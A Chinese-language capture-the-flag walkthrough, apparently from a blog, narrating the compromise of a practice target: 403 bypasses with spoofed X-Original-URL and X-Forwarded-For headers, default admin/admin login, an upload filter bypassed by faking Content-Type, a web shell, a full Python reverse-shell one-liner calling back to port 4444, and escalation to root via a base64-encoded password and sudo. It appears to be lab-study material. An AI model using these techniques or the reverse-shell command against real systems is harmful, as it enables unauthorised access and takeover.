
第八周打靶过程及思路:
1.常规端口服务侦探
2.查看是否存在易读的文件发现没有,查看网站源码也没有,使用whatweb侦探网站指纹
发现bootstrap这样一个前端的框架
3.大部分页面403,做403页面绕过
①旁站绕过403:将主机名进行替换
②覆盖URL进行绕过:
GET / HTTP/1.1
X-Original-URL: /auth/login
或者X-Rewrite-URL
X-Oringinating-IP:127.0.0.1 X-Forwarded-For:127.0.0.1 X-Remote-IP:127.0.0.1
③通过referer头部修改
ReFerer:http://xxx/auth/login
4.通过弱口令两个admin进入后台发现文件上传的点,但是存在基础的过滤
更改content-type为image/png 发现可以绕过过滤
或者在数据段中更改头部信息 比如加入PNG
5.蚁剑连接shell,在页面上进行参数执行获取反dshell成功
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.15”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
6.开始进行提权
首先进行shell优化 python -c “import pty;pty.spawn(‘/bin/bash’)”
然后查看/etc/passwd下的账号
查看home下的目录发现一个文件,base64解密后发现一个账号密码
ssh成功登录获得权限
sudo -l查看有root的权限发现可以运行所有程序
sudo -s成功切换到root
7.获得flag,打靶完成
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)